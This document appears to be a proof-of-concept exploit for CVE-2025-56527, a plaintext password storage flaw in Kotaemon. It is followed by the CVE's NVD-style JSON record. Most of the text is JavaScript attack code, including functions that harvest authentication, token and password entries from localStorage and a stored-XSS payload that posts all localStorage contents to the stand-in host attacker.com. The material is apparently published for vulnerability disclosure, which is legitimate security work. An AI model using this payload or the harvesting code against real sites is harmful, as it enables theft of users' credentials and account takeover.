CVE-2025-56527

// CVE-2025-56527 PoC - Plaintext Password Storage in Kotaemon localStorage // This PoC demonstrates how an attacker can extract plaintext credentials from localStorage // Attack vector 1: Direct localStorage access via JavaScript function stealCredentials() { const storageKeys = Object.keys(localStorage); const credentials = {}; storageKeys.forEach(key => { const value = localStorage.getItem(key); // Look for authentication-related keys if (key.toLowerCase().includes('auth') || key.toLowerCase().includes('token') || key.toLowerCase().includes('password') || key.toLowerCase().includes('user') || key.toLowerCase().includes('credential')) { credentials[key] = value; } }); return credentials; } // Attack vector 2: XSS-based credential theft // Inject this payload via Stored XSS to steal plaintext passwords const xssPayload = ` <script> fetch('https://attacker.com/steal', { method: 'POST', body: JSON.stringify({ url: window.location.href, credentials: Object.assign({}, localStorage) }) }); </script> `; // Attack vector 3: Automated credential extraction function extractAllLocalStorage() { const data = {}; for (let i = 0; i < localStorage.length; i++) { const key = localStorage.key(i); data[key] = localStorage.getItem(key); } console.log('Extracted localStorage data:', data); return data; } // Execute credential theft const stolenCredentials = stealCredentials(); console.log('Stolen credentials:', stolenCredentials); // Check for plaintext password fields Object.keys(stolenCredentials).forEach(key => { try { const parsed = JSON.parse(stolenCredentials[key]); if (parsed.password || parsed.pwd || parsed.credentials) { console.log('Found plaintext password:', parsed); } } catch (e) {} });

{"cve": {"id": "CVE-2025-56527", "sourceIdentifier": "[email protected]", "published": "2025-11-18T17:16:04.760", "lastModified": "2025-12-02T19:37:49.817", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Plaintext password storage in Kotaemon 0.11.0 in the client's localStorage."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-256"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:cinnamon:kotaemon:*:*:*:*:*:*:*:*", "versionEndIncluding": "0.11.0", "matchCriteriaId": "3A364AA3-7EC9-49E9-AF67-F3E649361780"}]}]}], "references": [{"url": "https://github.com/Cinnamon/kotaemon", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/Cinnamon/kotaemon/commit/37cdc28", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/HanTul/Kotaemon-CVE-2025-56526-56527-disclosure", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://harvest-sink-590.notion.site/Stored-XSS-via-Unsanitized-PDF-Content-Rendering-and-Plaintext-Credential-Exposure-in-LocalStorage-236770c3fe1e80f6a1aef381fb1c8f73", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://skinny-exoplanet-584.notion.site/Stored-XSS-via-Unsanitized-PDF-Content-Rendering-and-Plaintext-Credential-Exposure-in-LocalStorage-22cd1563bd3380458588eb49f361a363?pvs=74", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}